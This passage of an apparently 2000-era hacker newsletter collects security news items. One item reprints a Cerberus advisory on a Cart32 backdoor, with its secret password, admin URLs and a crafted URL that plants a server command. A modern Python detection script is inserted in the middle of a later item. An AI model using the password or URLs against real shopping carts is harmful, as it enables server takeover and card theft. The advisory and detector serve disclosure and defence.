The attack stopped Internet traffic to AboveNet's customers for several hours starting late Tuesday morning.
The White Plains, N.Y., company is working with the FBI to investigate the attack and declined to give more-specific details.

Vixie did say that tracking the attacker should not be as difficult as February's DoS attacks had been. "Technically, there is cause for hope, where in the (denial of service) case there was no cause for hope," he said.

Last week, a 15-year-old Canadian boy who called himself "Mafiaboy" online was arrested by the Royal Canadian Mounted Police and charged in connection with the denial-of-service attack on CNN's online site in February. The teen, whose name was not released due to his age, was arrested April 15 and formally charged two days later with two counts of mischief to data after police searched his home. No suspects have been named in the attacks on at least seven other sites, however.

AboveNet attack more skilled

This attacker seemed a bit more skilled than the cybervandals who flooded eight major Web sites in February, Vixie said. "I would bet that this was someone with a little more experience than the last batch."

AboveNet provides Internet service for and hosts the Web sites of nearly 1,000 companies, with offices in the United Kingdom, Germany, the Netherlands and Japan.

Vixie said Tuesday's attack could not succeed again. "We plugged the hole that has allowed it to happen," he said.

@HWA

111.0 [HNN] Thailand Has No Software Industry Due To Piracy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 26th

contributed by root

The Business Software Alliance has blamed Thailand's 82% piracy rate for preventing the development of a local software industry. The Thai Software Industry Association said that it expects 30% growth in the local software industry to 7 billion baht ($447.4 million) in 2000 despite the piracy rate.
Reuters
http://dailynews.yahoo.com/h/nm/20000425/tc/thailand_piracy_1.html

Dead Url (Yahoo blows for this) - Ed

@HWA

112.0 [HNN] War Plans Found on Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 26th

contributed by Evil Wench

The Web Risk Assessment Team, a reserve component unit designed to score public web sites for classified information has found quite a lot. 1,300 'discrepancies' were found on over 800 DOD web sites including highly classified information. Pentagon war plans were also discovered on at least ten separate occasions.

Federal Computer Week
http://www.fcw.com/fcw/articles/2000/0424/web-jtfcnd-04-26-00.asp

DOD Web-watchers find war plans online
BY Dan Verton

RELATED STORIES
"DOD pushing forward on Internet disconnect" [FCW.com, April 26, 2000]
"DOD boosts IT security role" [Federal Computer Week, Oct. 4, 1999]

04/26/2000

A new reserve unit that monitors the Defense Department’s presence on the World Wide Web has found an astonishing amount of classified or sensitive material on public sites.

The Web Risk Assessment Team, established by the Joint Task Force for Computer Network Defense, is made up of reservists who spend one weekend each month scanning DOD Web sites, according to Air Force Maj. Gen. John Campbell, commander of JTF-CND.

A survey of 800 major DOD sites on the Internet recently revealed as many as 1,300 "discrepancies," some of them involving highly classified information, Campbell said. The team uncovered more than 10 instances where information on Pentagon war plans was posted.

Also among the discoveries has been information on computer system vulnerabilities and more than 20 detailed maps of DOD facilities. Some of the maps and photographs included detailed plans of a facility known as "Site R," which serves as the alternate Joint Communications Center for U.S. nuclear forces, according to Campbell. The overhead photo of "Site R" showed the location of underground tunnel entryways and a detailed floor plan of the facility.
Likewise, the Web site for an annual exercise known as "Cobra Gold" included an entire list of participating units, communications frequencies and call signs for aircraft and data on Identification Friend or Foe squawks, which are signals used by pilots to determine if a plane is friendly or enemy. In another instance, the team found a classified excerpt in a policy document on counterterrorism.

@HWA

113.0 [HNN] India May get New Cyber Laws
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 26th

contributed by root66

A federal information technology bill has been proposed in India and is set to be voted on next month. The proposed law will create a Cyber-Regulations Advisory Committee, a controller, and adjudicating officers to regulate cyber laws. There will also be a Cyber-Regulations Appellate Tribunal.

http://www.wired.com/news/culture/0,1284,35822,00.html

India Eyes Cyberlaws
by Frederick Noronha
3:00 a.m. Apr. 25, 2000 PDT

BANGALORE, India –- With estimates that nearly 2 million Indian citizens will be online by 2001, the world's second-most populous country is looking at ways to regulate cyberspace.

India is proposing a federal information technology bill to be voted on next month. One of India's premier law schools, based here, has plans to set up a national institute for cyber-legal studies and research.

The institute plans to research the problem of shifting business and trade to the cyber-media, and blending national and international standards. It is looking to sell the project to top Indian info-tech firms like Infosys and Wipro through collaboration with policy planners in the Indian government.

"We have made our blueprint, and plan to shortly approach friends in the info-tech sector," said Dr. Nripen L. Mitra, director of the National Law School of India University.

Bangalore, known as India's Silicon Valley, is a booming center for software and dot-com companies.
By the late 1990s, the city's software exports comprised nearly 57 percent of India's total exports. The city has an estimated 230 info-tech companies, employing nearly 25,000 professionals. Mitra said rapid growth is in need of swift responses. "Law behaves like a traditional Hindu wife, staying seven steps behind the husband," he said. The new high-tech economy also means Indian businessmen have to shift to the paperless world after adapting to doing business in a very bureaucratic country. "Until recently, there were no cyberlaws in India," said Na Vijayashankar, the author of a new book that explains the new laws that may take shape to control, regulate, and harness cyberspace for Indian e-commerce. The federal government recently brought forward the Information Technology Bill. Under the proposed law, which is expected to be tabled in New Delhi's Parliament in May, India will have a Cyber-Regulations Advisory Committee, a controller, and adjudicating officers to regulate cyberlaws. There will also be a Cyber-Regulations Appellate Tribunal. The proposed law defines what constitutes a cybercrime, and also has provisions to punish cyber-criminals. It sets up a framework for transactions involving computer-generated documents and communication. It also deems electronic documents as legally binding and acceptable in place of paper. Checks and bills, powers of attorney, trusts, wills, and contracts of sale of immovable property, however, will not be accepted in a digital format. Computer crimes recognized under the proposed law would affect hackers, and those who are not authorized to enter a system to download data, introduce viruses, damage data or the system, block access to authorized users, or even assist another person in contravening the law. 
Publishing electronic information that is considered obscene, tampering with computer source documents, breaching confidentiality, publishing false digital certificates, and failing to furnish information or tax returns also would be a violation of the law. If passed, the law would apply to anyone in or outside of India who tampers with a computer located in India. Contrary to other Indian laws, such as the Code of Criminal Procedure of 1973, additional powers have been given to the police to tackle cybercrime. Any senior police officer can enter and search any public place on suspicion without a warrant. Those guilty of securing access to the system without authorization could be fined up to 1 million rupees. Payment of damages would be made to the person affected. There are critics, of course. Some say the software sector has flourished in India precisely because of a lack of regulation. So while the framework for accepting electronic documents is welcome, businessmen say the government should stay out of trying to regulate much of the rest. Senior Indian government officials, however, point to some shocking cases, arguing that there's a need to regulate the cyberjungle. They cite cases where a popular Hindi film actress was depicted nude on the Internet using altered graphics. They also point to prominent cases of cybersquatting, where some small firms allegedly tried to snatch the trade names of huge newspapers. "We had no remedies in such cases. Night and day, hackers are taking on portals, too," said Gulshan Rai, the Ministry of Information Technology's senior director. Some Indian sites have also been the victims of hacking,­ especially after last year's federally-sanctioned nuclear tests in Rajasthan, near the Indo-Pakistan border. Rai said the IT bill would take care of issues of "authentication, origination, jurisdiction and attribution." In some cases of criminalized cyber-behavior, the liability would be civil. 
But repeated and more severe cases would be treated as criminal liability, Rai said.

E-commerce transactions are leading to ludicrous situations in taxation, said India's IT task force member Montek S. Ahluwalia. Music sold internationally on cassette tapes is being taxed, but the same music sold in digital format is not; services sold over the Net internationally are not taxed, while those sold within the country are, Ahluwalia said.

Rai said the cyber-surveillance and interceptions provisions of the new IT bill would require those offering over 2MB of bandwidth to give access to traffic to agencies like the Intelligence Bureau and Central Bureau of Investigation.

There are other laws already in place relating to cybercrimes.

"Just because you're on the Internet doesn't put you above national laws. Pornography and gambling is prohibited under the Indian Penal Code of 1860, advertisement regulations apply, and you can get hauled up for defamation, libel or slander," said Annapurna Ogoti, of the law firm Nishit Desai Associates.

@HWA

114.0 [HNN] Napster Backs 'Bizkit
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 26th

contributed by The Hex

Limp Bizkit has taken on controversial Napster as a sponsor of its free summer concert tour. The group's lead singer said that Napster was all about getting his art to the people and criticized people who chose to try and stop that.

Wired
http://www.wired.com/news/business/0,1367,35881,00.html

@HWA

115.0 [HNN] Dr. Dre Sues Students for Napster Use
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 26th

contributed by root

Rap artist Dr. Dre has filed suit against five universities and students for violating copyright laws by using Napster. The lawsuit did not specifically name any students or schools; it left them open to be named later. The lawsuit seeks $100,000 per illegally copied work. In an unrelated story Dr.
Dre has been sued by LucasFilm for using the trademark THX sound at the beginning of his album, even after being denied permission. (I guess it is Ok to steal other peoples work as long as they don't steal yours.) C|Net http://news.cnet.com/news/0-1005-200-1760313.html?tag Rap artist sues Napster, students By John Borland Staff Writer, CNET News.com April 25, 2000, 5:00 p.m. PT Rap artist Dr. Dre sued MP3-swapping firm Napster today, adding a new layer of legal woes to the already besieged company. But this time, the stakes are being raised: Dr. Dre also is targeting students at universities who are using the Napster software to download MP3 files, putting individual music listeners into the legal line of fire. It's the second lawsuit filed by musicians who say the controversial software is responsible for massive violations of their copyrights. Heavy metal band Metallica also is seeking to close Napster's digital doors. Dr. Dre demanded last week that Napster remove his work from its service. But the company refused, saying it could only remove individual users identified as copyright violators. In response, the artist is asking that the court shut down Napster and award damages of $100,000 per illegally copied work. That could amount to close to $10 million, according to the lawsuit. "Napster devised and distributes software whose sole purpose is to permit (the company) to profit by abetting and encouraging the pirating of the creative efforts of the world's most admired and successful musical artists," the suit reads. The young company, started last year by 19-year-old student Shawn Fanning, has thrown the music industry into a kind of panic. Fanning's software allows people to link their computers directly to each other to share their music collections without paying companies or artists for the songs. At any time, thousands of people are online, sharing hundreds of thousands of songs through Napster's directory. 
The Recording Industry Association of America (RIAA) was the first to take legal action, suing Napster late last year. Metallica joined this month but set its legal sights on three universities it said were responsible for their students' illegal use of the software.

But Dr. Dre, whose real name is Andre Young, also trains the specter of legal responsibility directly on the students themselves.

No individual students or universities were named in the version of Dr. Dre's suit filed today. Instead, it is serving as a kind of placeholder, noting that five schools and students will be named later.

That could serve as an effective scare tactic, based on events of the past week. Already the three universities named in Metallica's lawsuits have blocked or sharply restricted use of Napster on their campuses. The threat of any other school or student being added to this new lawsuit could push other universities in the same direction and dissuade students from using the service.

Dr. Dre himself released a terse explanation for his legal action.

"I don't like people stealing my music," he said in a press release today.

In a coincidence of the courts, Dr. Dre himself was sued for copyright infringement last week. George Lucas' LucasFilm contends that the artist used the trademarked THX sound, which appears before many movies, to open his most recent album, even after being denied permission.

Dr. Dre's suit was filed in a Los Angeles federal court.

(Dr. Dre fuck you, and fuck Metallica, quit listening to your lawyers and go hunt the real pirates, like buy a clue. - Ed )

@HWA

116.0 [HNN] Chernobyl Hits South Korea
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 27th

contributed by root

The Ministry of Information and Communication in South Korea has reported that it has received almost 2,000 complaints regarding the Chernobyl or CIH virus. Last year CIH infected almost 300,000 systems in the country.
ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2555878,00.html?chkpt Chernobyl virus nukes S. Korean PCs Thousands of small businesses and personal users had their hard drives cleaned out by the infamous CIH virus. By Reuters April 26, 2000 7:02 AM PT SEOUL -- The so-called Chernobyl computer virus struck South Korea on Wednesday, wiping out hard disks at hundreds of companies, the Ministry of Information and Communication said on Wednesday. The ministry reported it received almost 2,000 complaints about the virus, which struck on the 14th anniversary of the Chernobyl nuclear accident in the Ukraine. A ministry official said far worse damage was caused last year. "In 1999, the outbreak of the virus affected up to 300,000 computers, and larger companies took the brunt of the damage,'' said the official. ``This time, it's likely to be 5 percent of that.'' He said individuals and small companies accounted for more than 70 percent of the complaints reported on Wednesday. He gave no estimate of the value of the damage caused by the virus erasing data on hard disk drives and corrupting communications software. @HWA 117.0 [HNN] Russian Gas Supplier Invaded by Cyber Criminals ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 27th contributed by mr.big23 and William Knowles Gazprom, a huge state-run gas monopoly, was one of many targets hit by cyber criminals last year in Russia, officials have said. Acting with an employee at the company the criminals were able to bypass the company's security and gained access to the gas control systems. The report also registered 852 cases of computer crime in Russia in 1999, up twelve-fold from the year before. (This story sounds more like a convenient way to place blame on hackers over likely Russian mismanagement or corruption.) 
Associated Press - via Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,500197283-500270387-501418162-0,00.html

Deceased Url

@HWA

118.0 [HNN] G8 Plans Cyber Security Conference
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 27th

contributed by root66

The Group of Eight major industrialized nations will hold a conference in Paris next month about how governments and companies should interact when confronted with cybercrime. The May 15-17 conference will be attended by representatives of 150 major private firms alongside delegations from G-8 states Italy, France, Britain, Germany, Japan, Russia, Canada and the United States. The conference's aim was to study the challenges to security and consumer confidence posed by new information and communication technologies.

Associated Press - via San Jose Mercury News
http://www.mercurycenter.com/svtech/news/breaking/internet/docs/467487l.htm

Url died

@HWA

119.0 [HNN] Cyber Crime Institute Established
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 27th

contributed by mr.big23

Carnegie Mellon University has created a research institute this month dedicated to prevention rather than response. (Yeah!) The Carnegie Mellon Institute for Survivable Systems will work with both the public and private sector and will use resources and people from the CERT coordination center.

CNN
http://www.cnn.com/2000/TECH/computing/04/26/cybersecurity/index.html

Carnegie Mellon establishes anti-hacking institute

April 26, 2000
Web posted at: 5:16 p.m. EDT (2116 GMT)

By Richard Stenger
CNN Interactive Writer

PITTSBURGH, Pennsylvania (CNN) -- A Pennsylvania university created a research institute this month dedicated to fighting computer attacks like those that besieged major Web sites like eBay, Yahoo! and CNN.com in February.
Unlike other computer network security R&D centers, the Carnegie Mellon Institute for Survivable Systems will solicit private as well as federal funds and concentrate on prevention rather than response, according to CMISS officers. The new research group, which will seek partnerships and fee-for-service arrangements with the public and private sectors, will draw resources and personnel from other Carnegie University facilities, in particular from the CERT Coordination Center. But unlike the CERT center, CMISS will not have restrictive limits on corporate money. The CERT center receives most of its money from U.S. agencies like the Department of Defense, the FBI and the IRS. And the federal government sets strict limits for private investment in the center, said Bill Pollack, a spokesman for CMU's Software Engineering Institute, the parent department of CERT and CMISS. "There's a limit on growth because of that. CMISS enables the Carnegie Mellon community to get all kinds of funding," Pollack said. CMISS hopes eventually to have an annual operating budget of $40 million, in large part funded by the private sector, he said. E-commerce businesses could be receptive to CMISS' research, considering sporadic attacks from an average teenager can cost them billions of dollars. "There hasn't been a good foundation of data available to help researchers understand the key factors that contribute to actual losses," said CMU Computer Science Dean James Morris, in a statement. The CERT center was created after the Morris Worm incident crippled about 10 percent of all computers on the Internet in 1988. Since then dozens of computer emergency response teams have sprung up, but they tend to focus on hacking breaches after the fact, according to CMISS. The new institute will try to solve network security problems before they have a broad impact. "Information assurance, as it's practiced today, is not a science. 
It remains largely ad hoc," said CMU Engineering Dean John Anderson, in a statement.

CMISS has already earned praise from Sen. Rick Santorum of Pennsylvania.

"Carnegie Mellon's ... effort will, for the first time, establish a public-private partnership that will help safeguard our national security," Santorum said in a statement. He chairs the U.S. Senate's task force on cybersecurity.

@HWA

120.0 [HNN] Domain Lock Down Launched
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 27th

contributed by mr.big23

Domain registrar Register.com Inc. Wednesday launched Domain Lock Down, a service that protects domain names from being hijacked. The new service will be able to "lock" names at the registry level, which helps prevent unauthorized alterations to name server and registrar information and blocks deletions of a domain name for the length of the registration term.

Internet News
http://www.internetnews.com/bus-news/article/0,2171,3_348071,00.html

Register.com Launches Domain Security Service

By Carol King

Domain registrar Register.com Inc. Wednesday launched Domain Lock Down, a service that protects domain names from being hijacked.

With the new service, register.com (RCOM), "locks" names at the registry level, which helps prevent unauthorized alterations to name server and registrar information and blocks deletions of a domain name for the length of the registration term.

As a result, customers using the service have greater security over their domain names and can reduce the risk of illegal tampering. The service costs $99 per name.

In light of the recent hijacking incidences, register.com felt it was essential to provide customers with peace of mind, according to Richard Forman, the company's president and chief executive officer.

"Because a domain name is the key access point to the Internet, businesses cannot afford to suffer the effects of illegal domain tampering," he says.

"By locking down a domain, register.com corporate services customers increase the security of their business."

@HWA

121.0 [HNN] Backdoor Found in Shopping Cart Software
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 28th

contributed by root66

Cerberus Information Security has found a secret password that allows someone connecting to a web site running "Cart32" shopping cart software to gain access to the server. The backdoor could reveal such data as credit card numbers, order information, and shipping addresses. McMurtrey-Whitaker which sells cart32 said that they will have a patch available next week. @Stake L0pht labs has issued its own fix for users who cannot wait that long.

Cerberus-infosec
@Stake L0pht Labs
Wired
ZD Net

http://www.cerberus-infosec.co.uk/advcart32.html
http://www.l0pht.com/
http://www.wired.com/news/politics/0,1283,35954,00.html
http://www.zdnet.com/zdnn/stories/news/0,4586,2556876,00.html

Cerberus Information Security Advisory (CISADV000427)
http://www.cerberus-infosec.co.uk/advisories.shtml

Released         : 27th April 2000
Name             : Cart32 secret password Backdoor
Affected Systems : Any Win32 based web server using Cart32
Issue            : Attackers can run arbitrary commands on the web server
                   and/or gain access to credit card information.
Authors          : David Litchfield (mnemonix@globalnet.co.uk) and
                   Mark Litchfield (xor-syst@devilnet.co.uk)

Description
***********

The Cerberus Security Team has discovered a serious security hole in McMurtrey/Whitaker & Associates, Inc's Win32 e-Commerce shopping cart, namely, Cart32 (http://www.cart32.com/) that can only be described as a blatant backdoor.
Within cart32.exe, the main file that provides the cart's functionality, there is a secret hidden password that can be used to gain vital information such as other passwords and using these an attacker can modify the shopping cart's properties so that arbitrary commands may be run on the server as well as gain access to customers' credit card details, shipping addresses and other highly sensitive information.

Details
*******

Within cart32.exe there is a secret backdoor password of "wemilo" (found at file offset 0x6204h) known internally as the Cart32Password. With knowledge of this password an attacker can go to one of several undocumented URLs such as

http://charon/scripts/cart32.exe/cart32clientlist

and obtain a list of the passwords for each Cart32 client. (A client is essentially a shop site). Although these passwords appear to be hashed they can still be used. For example they can be embedded in a specially crafted URL that will allow the attacker to prime the server to run an arbitrary command when an order is confirmed:

http://charon/scripts/c32web.exe?TabName=Cart32%2B&Action=Save+Cart32%2B+Tab
&SaveTab=Cart32%2B&Client=foobar
&ClientPassword=e%21U%23_%25%28%5D%5D%26%25*%2B-a&Admin=&AdminPassword=&TabT
oSave=Cart32%2B&PlusTabToSave=
Run+External+Program&UseCMDLine=Yes&CMDLine=cmd.exe+%2Fc+dir+%3E+c%3A%5Cfile
.txt

This URL will set the cart's properties to spawn a shell, perform a directory listing and pipe the output to a file called file.txt on the root of the C: drive when an order is confirmed. After doing this the attacker would then create a spurious order and confirm it thus executing the command. (Please note that the above URL is pertinent only to an internal Cerberus server - password details and client info would need to be changed to reflect the site in question).

Further to this the Cerberus Security Team has found what is, perhaps, a second backdoor.
By going directly to the following URL

http://charon/scripts/c32web.exe/ChangeAdminPassword

it is possible to change the administrative password without knowledge of the previous one.

Solution
********

Cerberus recommends that the following steps be actioned immediately. Cerberus has tested this in their labs and the Cart functionality will not be broken by following these steps.

1) Download a Hex Editor such as UltraEdit (http://www.ultraedit.com) and edit cart32.exe changing the "wemilo" password to something else. This will address the first issue.

2) Because c32web.exe is the administration program for Cart32 only site administrators will need access to it. Set the NTFS permissions on this file so that only Administrators have access to it. This way anyone attempting to access this file to change the admin password will be prompted for an NT account and password. For other "servers" such as Windows 95 and 98 Cerberus recommends removing this file.

Cerberus vulnerability scanner, CIS, has been updated to include checks for these issues and is available for free download from their website http://www.cerberus-infosec.com/

Vendor Status
*************

Due to the severity and seriousness of this issue, Cerberus has taken the rare step of making this information publicly available before the vendor has provided a patch. This is not normally Cerberus policy, however, as we have provided fix/workaround information in this advisory we believe we are not putting customers at any risk they would not have otherwise been exposed to.

About Cerberus Information Security, Ltd
********************************

Cerberus Information Security, Ltd, a UK company, are specialists in penetration testing and other security auditing services.
They are the developers of CIS (Cerberus' Internet security scanner) available for free from their website: http://www.cerberus-infosec.com

To ensure that the Cerberus Security Team remains one of the strongest security audit teams available globally they continually research operating system and popular service software vulnerabilities leading to the discovery of "world first" issues. This not only keeps the team sharp but also helps the industry and vendors as a whole ultimately protecting the end consumer. As testimony to their ability and expertise one just has to look at exactly how many major vulnerabilities have been discovered by the Cerberus Security Team - over 60 to date, making them a clear leader of companies offering such security services.

Founded in late 1999, by Mark and David Litchfield, Cerberus Information Security, Ltd are located in London, UK but serves customers across the World. For more information about Cerberus Information Security, Ltd please visit their website or call on +44(0) 208 395 4980

Permission is hereby granted to copy or redistribute this advisory but only in its entirety.

Copyright (C) 2000 by Cerberus Information Security, Ltd

@HWA

122.0 [HNN] FBI Investigating AboveNet DoS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 28th

contributed by root66

The FBI is investigating a denial of service attack that hit San Jose-based AboveNet Communications Inc. on Tuesday. According to AboveNet the attack was directed at a network device called a customer aggregation switch. The problem lies within AboveNet's methodologies as opposed to a vulnerability within the switch said a representative of AboveNet.
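Looking back at the Cart32 advisory in section 121.0: the following is an added example, not part of the advisory and not Cerberus's CIS scanner. It checks a copy of cart32.exe for the unmodified backdoor string and flags access-log requests to the URLs the advisory names. The Common Log Format, the sample bytes and log lines (all constructed), and every function name are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Password string named in the advisory. Finding it means the binary has not
# had the advisory's hex-edit workaround (or a vendor patch) applied.
BACKDOOR_PASSWORD = "wemilo"

# URL path endings the advisory identifies, lower-cased for matching.
SUSPICIOUS_PATHS = {
    "/cart32.exe/cart32clientlist": "client password list requested",
    "/c32web.exe/changeadminpassword": "admin password change page requested",
}

# Assumption: the web server writes Common Log Format access logs.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def find_backdoor_password(binary):
    """Return (encoding, offset) for each occurrence of the password in file bytes.

    The page does not say how the string is stored, so both single-byte and
    UTF-16LE forms are searched (an assumption made for this example).
    """
    hits = []
    for label, codec in (("ascii", "ascii"), ("utf-16le", "utf-16-le")):
        needle = BACKDOOR_PASSWORD.encode(codec)
        start = 0
        while (pos := binary.find(needle, start)) != -1:
            hits.append((label, pos))
            start = pos + 1
    return hits


def classify_request(target):
    """Return the reasons a request target matches the advisory (empty if none)."""
    parts = urlsplit(target)
    # Decode %xx escapes and fold case so trivially re-encoded paths still match.
    path = unquote(parts.path).lower().rstrip("/")
    reasons = [why for ending, why in SUSPICIOUS_PATHS.items() if path.endswith(ending)]
    if "/c32web.exe" in path:
        params = {k.lower(): v for k, v in parse_qs(parts.query).items()}
        use_cmd = [v.lower() for v in params.get("usecmdline", [])]
        # The advisory describes a saved command line that runs when an order is
        # confirmed. Administrators can set it too, so review the source address.
        if "cmdline" in params or "yes" in use_cmd:
            reasons.append("order-confirmation command line being set")
    return reasons


def scan_log(lines):
    """Return (line_no, client_ip, reason, blocked) for every matching request.

    blocked is True for 401/403 responses, which is what the advisory's NTFS
    permission step should produce for c32web.exe.
    """
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.match(line)
        if not match:
            continue
        blocked = match["status"] in ("401", "403")
        for reason in classify_request(match["target"]):
            findings.append((line_no, match["ip"], reason, blocked))
    return findings


# Constructed sample data (documentation IP ranges, placeholder command line).
SAMPLE_UNPATCHED = b"\x00" * 8 + b"wemilo" + b"\x00" * 4
SAMPLE_EDITED = b"\x00" * 8 + b"Xq7rT2" + b"\x00" * 4
SAMPLE_LOG = """
192.0.2.10 - - [27/Apr/2000:10:01:02 +0000] "GET /index.html HTTP/1.0" 200 512
198.51.100.7 - - [27/Apr/2000:10:05:40 +0000] "GET /scripts/cart32.exe/Cart32ClientList HTTP/1.0" 200 2048
198.51.100.7 - - [27/Apr/2000:10:06:11 +0000] "GET /scripts/c32web.exe?Client=demo&UseCMDLine=Yes&CMDLine=PLACEHOLDER HTTP/1.0" 200 900
198.51.100.7 - - [27/Apr/2000:10:07:30 +0000] "GET /scripts/c32web%2Eexe/ChangeAdminPassword HTTP/1.0" 401 0
""".strip().splitlines()

if __name__ == "__main__":
    print("unpatched binary hits:", find_backdoor_password(SAMPLE_UNPATCHED))
    print("edited binary hits:   ", find_backdoor_password(SAMPLE_EDITED))
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A hit with blocked set to False on either c32web.exe pattern means the advisory's second step (restricting that file to Administrators) is not in effect on that server.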
ComputerWorld http://www.computerworld.com/home/print.nsf/(frames)/000427D962?OpenDocument&~f FBI investigates cyberattack against AboveNet By Ann Harrison 04/27/2000 As investigators continue to search for attackers who temporarily shut down eight e-commerce sites in February, another company was hit by a different type of denial-of-service attack Tuesday. The FBI is investigating a denial-of-service attack launched against San Jose-based AboveNet Communications Inc. that blocked traffic to almost a thousand content and service providers. FBI spokeswoman Deb Weierman said the bureau is looking into the AboveNet incident "to see what activity went on." However, she added that because it is an ongoing case, she couldn't divulge any details about the investigation. Unlike the earlier distributed denial-of-service attacks that flooded e-commerce sites with false data traffic, this attack was directed against a switch in AboveNet's network. AboveNet's Internet Service Exchange (ISX) network provides co-location services and Internet connectivity to companies such as NetZero Inc., CNet Inc. and America Online Inc., which wasn't affected by the outage. "This wasn't just a teen-ager with a $300 Linux machine. This was someone who had time to learn the trade," said Paul Vixie, senior vice president of Internet services at Metromedia Fiber Network Inc. in White Plains, N.Y., AboveNet's parent company. "It was certainly severe; most of our customers were impacted for a period of hours." According to Vixie, the attack was directed at a network device called a customer aggregation switch. The switch bundles co-location customers at the company's ISX facilities and links them to an Internet backbone as one high-speed connection. Vixie said the attack hit three switches at the company's ISX facilities in New York, Vienna, Va., and San Jose. The switch is made by Cisco Systems Inc., but Vixie said the exploit had nothing to do with a defect in the switch. 
He said the attacker exploited a flaw in the switch's configuration management process that the company has since changed.

"There are certainly good and bad ways to do that. We thought we were using a good way, and (this week) we found out that we weren't," said Vixie. "The hole closed was in the process, not in the product."

Stephen Northcutt, director of the Global Incident Analysis Center for the SANS Institute, declined to comment on the specifics of the AboveNet case. But he said the real problem isn't the attacks but what can be done about them.

"We're focusing on the wrong thing," Northcutt said. "We're focusing on the actual attack. What we need to focus on are the systems that are being compromised every day."

Vixie said he believes there is little opportunity for copycat attacks because of the unique methods AboveNet used to manage its network.

The company suffered rolling outages from mid-morning Pacific time on Tuesday to mid-afternoon. According to Vixie, many customers had alternative carriers that ensured their network traffic got through — a common fail-over strategy for high-end customers. Very large customers, such as AOL, whose traffic wasn't funneled through the aggregation switch, weren't impacted.

Vixie advised other information technology managers who may be concerned with the management of their switches to consult with their vendors on proper switch management and configuration. He said swift action is also needed to deflect such attacks.

Close network monitoring revealed the connectivity loss to customers, and AboveNet launched an investigation immediately.

"We used brute force," said Vixie. "We called everyone in on the shift and went through the network with a fine-tooth comb, not only to get everyone back up online, but to make sure there were no time bombs." He added that no backdoors or other delayed exploits were detected.
Vixie says the company has speculated widely as to the motive for the attack and concluded that it could have emerged from one of two "completely useless categories." One category includes competitors that the company took a customer away from, disgruntled former employees or customers who had been disconnected because they were spamming. The other category, said Vixie, includes "someone who has something to prove and wants to bring our network down and wants to brag about it." The denial-of-service attacks launched in February have proved difficult to trace because of the sheer volume of the attacks and the fact that targeted sites weren't able to capture attack data during the incident. But Vixie said the FBI has a reasonable chance of catching his company's attacker, partly because AboveNet has put resources into filtering, logging and traffic analysis. "We did not come away from (Tuesday's) experience completely ignorant," said Vixie. The February attacks against eight large e-commerce sites appeared to involve known attack tools such as Tribe Flood Network and Trinoo, which use co-opted machines to send a storm of packets against targeted sites (see story). Vixie said that because of the ongoing investigation, he couldn't say whether known exploits were used in the AboveNet attack. A 15-year-old Canadian, who allegedly calls himself Mafiaboy, was arrested April 15 by the Royal Canadian Mounted Police and charged in connection with a February denial-of-service attack against the CNN Web site. He was charged with two counts of mischief to data, but security analysts believe he likely wasn't responsible for the other attacks (see story). An investigation is ongoing, but no other suspects have yet been named. Brian Sullivan contributed to this story. 
@HWA

123.0 [HNN] Intel Removes ID Feature From New Chips
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 28th

contributed by Evil Wench

Intel has decided to remove the controversial ID-tracking technology from its next generation PC processor. The ID was included in Pentium III chips as a way to help facilitate e-commerce solutions. Intel says the increase in the technology of digital signatures led them to this decision. (Yeah, the bad press and the boycott had nothing to do with it.)

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2556671,00.html?chkpt

Intel disables ID tracking in new chips

There was a firestorm of protest when Intel put ID-tracking technology in Pentium III chips. Now it's obsolete and being removed.

By Robert Lemos, ZDNet News
April 27, 2000 12:40 PM PT

Intel Corp. says it plans to remove the controversial processor-ID technology from its next-generation PC processor and from future processors, ending a year-long battle with privacy advocates over the invasive technology.

"We made the decision earlier this year," said George Alfs, a spokesman for Intel (Nasdaq: INTC) said Thursday. "We are not planning for (the chip ID) in our next processor."

Alfs said the rise of digital-signature technology has made the need for chip IDs obsolete.

As first reported on ZDNet News more than a year ago, the inclusion of the chip ID in the Pentium III processor touched off a heated controversy with privacy advocates denouncing the technology as an attempt to track users on the Internet.

Calls for boycott

Originally, Intel intended to ask PC makers to ship machines with the processor ID "on" -- that is, accessible to software -- but later changed tack by supplying a utility to customers to turn the feature on and off.

Still not satisfied, however, privacy advocates and policy analysts called for a boycott of the chip maker.

The boycott may have gone a long way to decide the issue, said Jason Catlett, president of pro-privacy Junkbusters Corp.
